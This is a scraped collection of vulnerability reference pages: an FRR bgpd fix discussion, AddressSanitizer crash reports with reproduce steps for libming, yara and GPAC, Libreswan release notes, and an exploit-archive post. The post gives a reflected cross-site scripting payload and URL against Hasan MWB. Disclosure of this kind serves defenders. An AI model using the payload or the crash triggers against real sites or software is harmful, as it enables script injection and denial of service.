*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 21, 2023

**

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 donaldsharp merged commit ff4c767 into FRRouting:master

Aug 21, 2023

6 checks passed

 mergify bot mentioned this pull request

Aug 21, 2023

bgpd: Check the length of the rcv software version (backport #14241) #14250

Merged

 ton31337 deleted the fix/software\_version\_capability\_handling\_len branch

August 21, 2023 13:53

donaldsharp added a commit that referenced this pull request

Aug 21, 2023

          Merge pull request #14250 from FRRouting/mergify/bp/stable/9.0/pr-14241
        

          d8238e9
        

bgpd: Check the length of the rcv software version (backport #14241)

Sign up for free **to join this conversation on GitHub**. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

backport bgp master size/S

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

None yet

3 participants

CVE-2023-41361: bgpd: Check the length of the rcv software version by ton31337 · Pull Request #14241 · FRRouting/frr

Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

A heap buffer overflow occurs when makeswf parse a invalid swf file, and the filename extension is .swf.

**Test Environment**

Ubuntu 20.04, 64 bit  
libming (master 04aee52)

**Steps to reproduce**

1.  compile libming with ASAN

    $ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configure 
    $ make
    

2.  Download the poc file from here and run cmd  
    $ makeswf $POC

**ASAN report**

    $ ./bin_asan/bin/makeswf ./poc-makeswf-04aee52-r_readc-HBO.swf
    Output file name: out.swf
    Output compression level: 9
    Output SWF version: 6
    =================================================================
    ==5625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60800000013f at pc 0x0000004f15b5 bp 0x7fff376560d0 sp 0x7fff376560c8
    WRITE of size 1 at 0x60800000013f thread T0
        #0 0x4f15b4 in r_readc /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34
        #1 0x4f1a37 in getbits /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:143:18
        #2 0x4f1656 in rect /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:169:9
        #3 0x4efe15 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:303:2
        #4 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #5 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #6 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #7 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #8 0x41c5a8 in _start (/opt/disk/marsman/libming/04aee52/bin_asan/bin/makeswf+0x41c5a8)
    
    0x60800000013f is located 199 bytes to the right of 88-byte region [0x608000000020,0x608000000078)
    allocated by thread T0 here:
        #0 0x4975fd in malloc /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
        #1 0x4ef8d8 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:271:41
        #2 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #3 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #4 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #5 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34 in r_readc
    Shadow bytes around the buggy address:
      0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
      0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c107fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==5625==ABORTING
    

1 participant

CVE-2023-40781: heap-buffer-overflow in r_readc() at fromswf.c:264 · Issue #288 · libming/libming

Buffer Overflow vulnerability in VirusTotal yara v.4.3.2 allows a remote attacker to execute arbtirary code via the yr_execute_cod function in the exe.c component.

**Describe the bug**  
AddressSanitizer: heap-buffer-overflow libyara/exec.c:1426 in yr\_execute\_code

**To Reproduce**  
Steps to reproduce the behavior:  
1, compile yara with asan: ./configure CC=gcc CXX=g++ CFLAGS="-g -O0 -fsanitize=address" CXXFLAGS="-g -O0 -fsanitize=address" LDFLAGS="-g -O0 -fsanitize=address"  
2, run this command: ./yara -C PoC binFile

**Please complete the following information:**

*   OS: ubuntu 20.04
*   YARA version: 4.3.2

****Additional context**  
ASAN reprot:**

\==1855158==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000248 at pc 0x7f168933dfaf bp 0x7ffd229d5530 sp 0x7ffd229d5520  
READ of size 8 at 0x604000000248 thread T0  
#0 0x7f168933dfae in yr\_execute\_code libyara/exec.c:1426  
#1 0x7f16893a1cd8 in yr\_scanner\_scan\_mem\_blocks libyara/scanner.c:526  
#2 0x7f16893a27a0 in yr\_scanner\_scan\_mem libyara/scanner.c:670  
#3 0x7f16893a2b3e in yr\_scanner\_scan\_fd libyara/scanner.c:706  
#4 0x55aa2e6ed11a in scan\_file cli/yara.c:736  
#5 0x55aa2e6f1444 in main cli/yara.c:1654  
#6 0x7f1688c22082 in \_\_libc\_start\_main ../csu/libc-start.c:308  
#7 0x55aa2e6e9ced in \_start (/home/root/latestFiles/yara-4.3.2/.libs/yara+0x7ced)

0x604000000248 is located 8 bytes to the left of 48-byte region \[0x604000000250,0x604000000280)  
allocated by thread T0 here:  
#0 0x7f1689535a06 in \_\_interceptor\_calloc ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cc:153  
#1 0x7f168936db41 in yr\_calloc libyara/mem.c:127  
#2 0x7f168939fe48 in yr\_scanner\_create libyara/scanner.c:242  
#3 0x55aa2e6f12af in main cli/yara.c:1640  
#4 0x7f1688c22082 in \_\_libc\_start\_main ../csu/libc-start.c:308

SUMMARY: AddressSanitizer: heap-buffer-overflow libyara/exec.c:1426 in yr\_execute\_code  
Shadow bytes around the buggy address:  
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c087fff8000: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa  
0x0c087fff8010: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa  
0x0c087fff8020: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa  
0x0c087fff8030: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa  
\=>0x0c087fff8040: fa fa 00 00 00 00 00 00 fa\[fa\]00 00 00 00 00 00  
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==1855158==ABORTING

CVE-2023-40857: heap-buffer-overflow libyara/exec.c:1426 in yr_execute_code · Issue #1945 · VirusTotal/yara

GPAC v2.3-DEV-rev449-g5948e4f70-master was discovered to contain a heap-use-after-free via the gf_bs_align function at bitstream.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted file.

**Description**

While fuzzing yasm, a "heap-use-after-free" crash occurs,which was positioned in /gpac/src/utils/bitstream.c:1225:19 in gf\_bs\_align.  
This bug may allow attackers to cause remote malicious code execution and denial of service via crafted files.

**Software version info**

    /AFLplusplus/my_test/fuzz_gpac # ./install/bin/MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev449-g5948e4f70-master
    (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    

**System version info**

    /AFLplusplus/my_test/fuzz_gpac # uname -a
    Linux 1344a5115a85 5.15.0-76-generic #83~20.04.1-Ubuntu SMP Wed Jun 21 20:23:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    

**Command to reproduce**

./MP4Box -xmt poc

**Result**

    [iso file] Unknown box type 0000bt in parent moov
    [iso file] Read Box type 00000000 (0x00000000) at position 1484 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 0) has 16719 extra bytes
    [iso file] Box "cmvd" (start 0) has 3 extra bytes
    =================================================================
    ==102==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110000001a4 at pc 0x7fc2471e90b9 bp 0x7ffd7e96f7b0 sp 0x7ffd7e96f7a8
    READ of size 4 at 0x6110000001a4 thread T0
        #0 0x7fc2471e90b8 in gf_bs_align /AFLplusplus/my_test/gpac/src/utils/bitstream.c:1225:19
        #1 0x7fc2471f9825 in gf_bs_skip_bytes /AFLplusplus/my_test/gpac/src/utils/bitstream.c:1371:2
        #2 0x7fc247e0c122 in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:381:3
        #3 0x7fc247e1202e in gf_isom_box_array_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1891:7
        #4 0x7fc247cbcc00 in moov_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_code_base.c:3920:9
        #5 0x7fc247e0e2bc in gf_isom_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1998:9
        #6 0x7fc247e0b57d in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:309:14
        #7 0x7fc247e0870f in gf_isom_parse_root_box /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:38:8
        #8 0x7fc247e4dd88 in gf_isom_parse_movie_boxes_internal /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:385:7
        #9 0x7fc247e4d3f7 in gf_isom_parse_movie_boxes /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:897:6
        #10 0x7fc247e5c426 in gf_isom_open_file /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:1023:19
        #11 0x7fc247e6cf8e in gf_isom_open /AFLplusplus/my_test/gpac/src/isomedia/isom_read.c:531:11
        #12 0x55fdd8167c04 in mp4box_main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6291:12
        #13 0x55fdd818ca05 in main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6933:1
        #14 0x7fc2466f6d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
        #15 0x7fc2466f6e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
        #16 0x55fdd8079be4 in _start (/AFLplusplus/my_test/fuzz_gpac/install/bin/MP4Box+0xebbe4) (BuildId: fc72159612509ffb)
    
    0x6110000001a4 is located 36 bytes inside of 200-byte region [0x611000000180,0x611000000248)
    freed by thread T0 here:
        #0 0x55fdd80fc782 in free (/AFLplusplus/my_test/fuzz_gpac/install/bin/MP4Box+0x16e782) (BuildId: fc72159612509ffb)
        #1 0x7fc2472250a8 in gf_free /AFLplusplus/my_test/gpac/src/utils/alloc.c:165:2
        #2 0x7fc2471e46c6 in gf_bs_del /AFLplusplus/my_test/gpac/src/utils/bitstream.c:381:2
        #3 0x7fc247e0b6ec in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:319:3
        #4 0x7fc247e1202e in gf_isom_box_array_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1891:7
        #5 0x7fc247cbcc00 in moov_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_code_base.c:3920:9
        #6 0x7fc247e0e2bc in gf_isom_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1998:9
        #7 0x7fc247e0b57d in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:309:14
        #8 0x7fc247e0870f in gf_isom_parse_root_box /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:38:8
        #9 0x7fc247e4dd88 in gf_isom_parse_movie_boxes_internal /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:385:7
        #10 0x7fc247e4d3f7 in gf_isom_parse_movie_boxes /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:897:6
        #11 0x7fc247e5c426 in gf_isom_open_file /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:1023:19
        #12 0x7fc247e6cf8e in gf_isom_open /AFLplusplus/my_test/gpac/src/isomedia/isom_read.c:531:11
        #13 0x55fdd8167c04 in mp4box_main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6291:12
        #14 0x55fdd818ca05 in main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6933:1
        #15 0x7fc2466f6d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    
    previously allocated by thread T0 here:
        #0 0x55fdd80fca2e in malloc (/AFLplusplus/my_test/fuzz_gpac/install/bin/MP4Box+0x16ea2e) (BuildId: fc72159612509ffb)
        #1 0x7fc247224fc8 in gf_malloc /AFLplusplus/my_test/gpac/src/utils/alloc.c:150:9
        #2 0x7fc2471e0c1c in gf_bs_new /AFLplusplus/my_test/gpac/src/utils/bitstream.c:135:38
        #3 0x7fc247e09f1c in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:207:17
        #4 0x7fc247e1202e in gf_isom_box_array_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1891:7
        #5 0x7fc247cbcc00 in moov_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_code_base.c:3920:9
        #6 0x7fc247e0e2bc in gf_isom_box_read /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:1998:9
        #7 0x7fc247e0b57d in gf_isom_box_parse_ex /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:309:14
        #8 0x7fc247e0870f in gf_isom_parse_root_box /AFLplusplus/my_test/gpac/src/isomedia/box_funcs.c:38:8
        #9 0x7fc247e4dd88 in gf_isom_parse_movie_boxes_internal /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:385:7
        #10 0x7fc247e4d3f7 in gf_isom_parse_movie_boxes /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:897:6
        #11 0x7fc247e5c426 in gf_isom_open_file /AFLplusplus/my_test/gpac/src/isomedia/isom_intern.c:1023:19
        #12 0x7fc247e6cf8e in gf_isom_open /AFLplusplus/my_test/gpac/src/isomedia/isom_read.c:531:11
        #13 0x55fdd8167c04 in mp4box_main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6291:12
        #14 0x55fdd818ca05 in main /AFLplusplus/my_test/gpac/applications/mp4box/mp4box.c:6933:1
        #15 0x7fc2466f6d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    
    SUMMARY: AddressSanitizer: heap-use-after-free /AFLplusplus/my_test/gpac/src/utils/bitstream.c:1225:19 in gf_bs_align
    Shadow bytes around the buggy address:
      0x0c227fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c227fff8020: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c227fff8030: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
      0x0c227fff8040: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
      0x0c227fff8050: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c227fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c227fff8070: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==102==ABORTING
    

**Poc**

Use the PoC in the attachment or in the following link.  
poc.zip

https://github.com/ChanStormstout/Pocs/blob/master/gpac\_POC/id%3A000000%2Csig%3A06%2Csrc%3A003771%2Ctime%3A328254%2Cexecs%3A120473%2Cop%3Ahavoc%2Crep%3A8

CVE-2023-39562: A `heap-use-after-free` crash in bitstream.c:1225:19 in gf_bs_align · Issue #2537 · gpac/gpac

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

An issue was discovered in Libreswan 3.x and 4.x before 4.12. When an IKEv1 ISAKMP SA Informational Exchange packet contains a Delete/Notify payload followed by further Notifies that act on the ISAKMP SA, such as a duplicated Delete/Notify message, a NULL pointer dereference on the deleted state causes the pluto daemon to crash and restart.

*   Aug 8, 2023
*   273ab05
*   zip
*   tar.gz
*   Notes

*   May 3, 2023
*   cbfa405
*   zip
*   tar.gz
*   Notes

*   Mar 1, 2023
*   b681175
*   zip
*   tar.gz

v4.9 (October 13, 2022)

\* IKEv1: fix crasher (introduced in 4.8) when USE\_NSS\_KDF=false or MD5 \[Andrew\]
\* IKEv2: fix RFC 8229 IKE/ESP over IPv6 TCP \[Andrew\]

*   Oct 14, 2022
*   394c823
*   zip
*   tar.gz

v4.8 (October 2, 2022)

\* release: remove SHA1 bindings from LIBRESWAN OpenPGP key \[dkg/Paul\]
\* pluto: ignore obsoleted unused interfaces= / --iface \[Paul/Andrew\]
\* pluto: various internal crypto struct changes \[Andrew\]
\* pluto: fix traffic counters for AH and IPCOMP \[Andrew\]
\* pluto: improve logging of duplicate serial cert error \[Andrew\]
\* pluto: support for maxbytes/maxpacket counters \[Antony/Paul\]
\* pluto: handle HW tokens using strange CKAIDs; github/815 \[Andrew\]
\* pluto: added --ipsec-max-bytes / --ipsec-max-packets support \[Antony\]
\* libipsecconf: added ipsec-max-bytes= and ipsec-max-packets= options \[Paul\]
\* IKEv2: emit one CERTREQ payload with all the hashes \[Andrew\]
\* addconn/whack: add support for {left,right}pubkey= \[Andrew\]
\* showhostkey: add support for ECDSA pubkeys \[Andrew\]
\* Crypto: add KDF self tests \[Daiki Ueno\]
\* IPv6: open IPv6 IKE port 4500; github/800 \[Andrew\]
\* showhostkey: add --pem option to print PEM encoded public key \[Andrew\]
\* unbound: \_unbound-hook converted from python to shell \[Andrew\]
\* BSD: delete old BSDKAME code replaced by PFKEYV2 code \[Andrew\]
\* BSD: fix replay window byte vs bit math \[Andrew\]
\* BSD: fix code finding interfaces; github/728 \[Andrew\]
\* FreeBSD: support large replay window; github/756 \[Andrew\]
\* FreeBSD: support ESN; github/721 \[Andrew\]
\* linux: update copy of xfrm.h header \[Paul\]
\* packaging: update fedora spec file \[Paul/Tuomo\]
\* building: on BSD, always use GCC; freebsd/264288 llvm/55963 \[Andrew\]
\* building: enable LTO when USE\_LTO=true; github/836 github/834 \[Andrew\]
\* building: dropped default build and packaging support for:
  	    Fedora 22, 28, 29, 30
            Debian stretch
            Ubuntu cosmic, xenial
            RHEL6 was removed in v4.5
            Add SUSE, Arch, Mint

*   Oct 3, 2022
*   be225bf
*   zip
*   tar.gz

v4.7 (May 24, 2022)

\* IKEv2: EAPTLS support \[Timo Teräs / Andrew\]
\* IKEv2: EAPONLY support \[Andrew\]
\* IKEv2: fix interop when IPCOMP+transport-mode \[Andrew\]
\* IKEv2: fix race between new IKE SA and liveness \[Andrew\]
\* IKEv2: fix interop with Android 12 + certificates \[Andrew\]
\* IKEv1: reject IKEv2 only authby=secret+rsasig \[Andrew\]
\* config: end keywords with no left/right prefix are applied to both ends
\* kernel: fix double delete of kernel policy when tearing down SA \[Andrew\]
\* kernel: fix deleting policy when an XFRMi FD ID; github/618 \[Andrew\]
\* kernel: general cleanups \[Andrew\]
\* \_stackmanager / pluto: support Ubuntu 18.04 LTS kernels \[Paul\]
\* FreeBSD: libreswan builds out-of-the-box \[Andrew\]
\* BSD: Add IPv6 support (tested on NetBSD)
\* building: fix build on fedora rawhide \[Paul\]
\* internals: initiate IKEv2 CREATE\_CHILD\_SA exchange using IKE SA \[Andrew\]
\* internals: \_updown.bsdkame renamed to \_updown.bsd

*   May 24, 2022
*   19eabcd
*   zip
*   tar.gz

v4.6 (January 11, 2022)

\* SECURITY: Fixes CVE-2022-23094 https://libreswan.org/security/CVE-2022-23094
\* IKEv2: aggressively check incoming fragments \[Andrew\]
\* IKEv2: when rekeying and PFS, only propose/allow original crypt-suite \[Andrew\]
\* IKEv2: when PFS, don't repeatedly log all proposals \[Andrew\]
\* IKEv2: Labeled IPsec improvements \[Andrew\]
\* IKEv1: support for ISAKMP\_N\_CISCO\_LOAD\_BALANCE removed \[Andrew\]
\* pluto: Revamp the host connection lookup mechanism \[Andrew\]
\* pluto: Change default replay-window from 32 to 128 \[Paul\]
\* pluto: Change default esn= to "either" and prefer "yes" \[Paul\]
\* pluto: Disable esn when replay-window=0 \[Paul\]
\* pluto: Drop obsolete debug options such as crypto-low \[Andrew\]
\* seccomp: Updated syscall allow-list \[Paul\]
\* packaging: replace old SUSE packaging with pointer to downstream \[Andrew\]
\* NetBSD: Don't use ESN - not supported by kernel \[Andrew\]
\* letsencrypt: Fix bashisms in letsencrypt script \[dkg\]
\* libipsecconf: allow leftauth=ecdsa|rsa (match authby= values) \[Paul\]
\* testing: significantly improved testing \[Andrew, Paul\]

*   Jan 12, 2022
*   5cb4ea7
*   zip
*   tar.gz

v4.5 (August 20, 2021)

\* IKEv1: multiple subnets could lead to crossed wires, failures \[Paul/Andrew\]
\* IKEv2: don't tear down IKE SA on TS\_UNACCEPTABLE \[Paul\]
\* IKEv2: unpend/delete Child SA when rejected by IKE\_AUTH response \[Andrew\]
\* IKEv2: mobike: resolve\_defaultroute\_one() updates \[Andrew\]
\* IKEv2: mobike: prevent sending duplicate mobike response \[Andrew\]
\* IKEv2: Support for Childless IKE SA \[Andrew\]
\* IKEv2: redirect: make peer redirecting in IKE\_AUTH childless \[Vukasin\]
\* IKEv2: Labeled IPsec --up causes Childless IKE SA \[Andrew/Paul\]
\* IKEv2: Labeled IPsec conns share SPD policies (as IKEv1) \[Andrew/Paul/Kavinda\]
\* IKEv2: Performance; eliminate more O(#CONNECTIONS) code \[Andrew\]
\* IKEv2: Immediately delete replaced Child from new (IC) IKE SA \[Andrew/Paul\]
\* pluto: mismatched subnets= could take down all conns \[Paul\]
\* pluto: Don't delete existing IKE SA of connection instance \[Paul\]
\* pluto: fail better on parse errors in subnet= clause \[Paul\]
\* libswan: use getaddrinfo(3) instead of gethostbyname2(3) \[Hugh\]
\* libipsecconf: fail to load conn if no right= or left= set \[Paul\]
\* libipsecconf: change default of initial-contact= to yes \[Paul\]
\* X509: directly append new CRL requests to the fetch queue \[Andrew\]
\* whack: implement --impair trigger:<global-event> \[Andrew\]
\* ipsec.service: remove reload which did not work as expected \[Tuomo\]
